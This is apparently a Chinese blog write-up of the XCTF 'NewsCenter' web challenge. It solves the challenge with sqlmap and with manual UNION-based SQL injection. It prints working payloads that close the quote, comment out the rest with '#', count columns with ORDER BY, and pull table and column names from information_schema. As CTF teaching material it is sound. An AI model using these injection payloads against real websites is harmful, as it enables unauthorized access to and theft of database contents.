攻防世界web进阶区NewsCenter详解
攻防世界web进阶区NewsCenter详解题目方法一sqlmap注入方法二手工注入题目我们输入搜索,很明显是一个注入方法一sqlmap注入抓到包之后,存到txt文件中,-r获取文件然后发现可以注入接着我们–dump直接获取到flag(比较暴力)方法二手工注入前引号为了闭合之前的语句,后面的#为了注释后面的引号否则都会报错我们使用orderby 查询有几列当我们写三时发现可以正常查询,4就不行了发
·
攻防世界web进阶区NewsCenter详解
题目
我们输入搜索,很明显是一个注入
方法一sqlmap注入
抓到包之后,存到txt文件中,
-r获取文件
然后发现可以注入
接着我们–dump直接获取到flag(比较暴力)
方法二手工注入
前引号为了闭合之前的语句,后面的#为了注释后面的引号
否则都会报错
我们使用orderby 查询有几列
当我们写三时发现可以正常查询,4就不行了
发现有一些前缀的文章,那么我们使用一些垃圾话将他查询失效
2和三可以回显
database数据库为news
我们查询他的表
woaini' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema='news'#
我们查询他的列
woaini' union select 1,group_concat(column_name),database() from information_schema.columns where table_name='secret_table'#
我们查询fl4g字段
有“AI”的1024 = 2048,欢迎大家加入2048 AI社区
更多推荐
2
0- 0
已为社区贡献4条内容
所有评论(0)